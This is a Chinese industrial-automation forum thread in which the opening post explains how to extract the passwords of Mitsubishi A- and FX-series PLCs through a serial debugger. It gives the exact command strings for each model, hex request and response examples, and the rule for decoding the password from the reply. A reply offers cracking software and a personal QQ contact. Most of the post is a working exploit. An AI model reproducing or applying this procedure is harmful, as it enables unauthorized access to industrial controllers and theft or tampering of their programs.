lxwcys
富士工控产品一级代理
级别: 略有小成
精华主题: 0
发帖数量: 62 个
工控威望: 248 点
下载积分: 546 分
在线时间: 18(小时)
注册时间: 2010-05-18
最后登录: 2024-03-24
查看lxwcys的 主题 / 回贴
楼主  发表于: 2010-05-24 11:28
1,使用串口调试器,设置好有关参数。

2,确定三菱PLC型号,根据PLC型号选择在串口调试器中输入对应字符串。

附:
PLC型号 对应字符串
FX2 \STX0700808\ETX6A
FX2N \STX0300808\ETX66
FX2_EPROM \STX0800808\ETX6B
FXON/FXOX \STX0800808\ETX6B
FX1N/FX1X \STX0800808\ETX6B

3、发送后在接收框中将显示一串字符串,如果你聪明的话一定会发现这些字符串的奥妙了。
(就是返回的密码)

     如果看不出来的话,将这些字符串拷贝到 HEX格式 中,发送一次看看。(发送前记得先断开PLC)
建议你自己设置一个密码,然后用这个方法读取一次看看,以后就知道是怎么回事了。

密码字符:0-9,A-F。

4,举例说明破解A和FX系列PLC密码:

A系列:
发送:A2 07 00 FF 02 05 AE 00 08 C3

接收:0B 00 FF 02 00 AA 77 55 BB EF CD AB A4 00

密码:ABCDEF

发送:A2 07 00 FF 02 05 AE 00 08 C3

接收:0B 00 FF 02 00 AA 77 55 BB C1 B1 A1 A4

密码:A1B1C1

分析:密码为返回字符中BB至A4之间的字符,以每2字符为单位,从右往左读出。 00E0202



FX系列:

设置串口:COM1,波特率:9600,数据位:7,校验:E偶,停止位:1

输入:EHX,显示:ASC

发送:
02 30 38 30 30 38 30 38 03 36 42
返回一串16进制的ASCII码,30为数字0,31为数字1,01为A,02为B,以此类推;

例:02 30 38 30 30 38 30 38 03 36 42


  \STX4236353433323130\ETX41

密码是:B6543210    《42=B》
本帖最近评分记录:
  • 下载积分:+1(tanghanshui) 优秀文章
    汇荣铝业
    级别: 网络英雄

    精华主题: 0
    发帖数量: 1784 个
    工控威望: 5345 点
    下载积分: 21348 分
    在线时间: 1601(小时)
    注册时间: 2009-07-21
    最后登录: 2024-12-23
    查看汇荣铝业的 主题 / 回贴
    1楼  发表于: 2010-05-24 12:16
    你这个太麻烦,我有一个直接读取的解密软件,三菱FX全系列(但不能解FX3U的),就是不知道怎样上传。想要的就加我QQ1030871447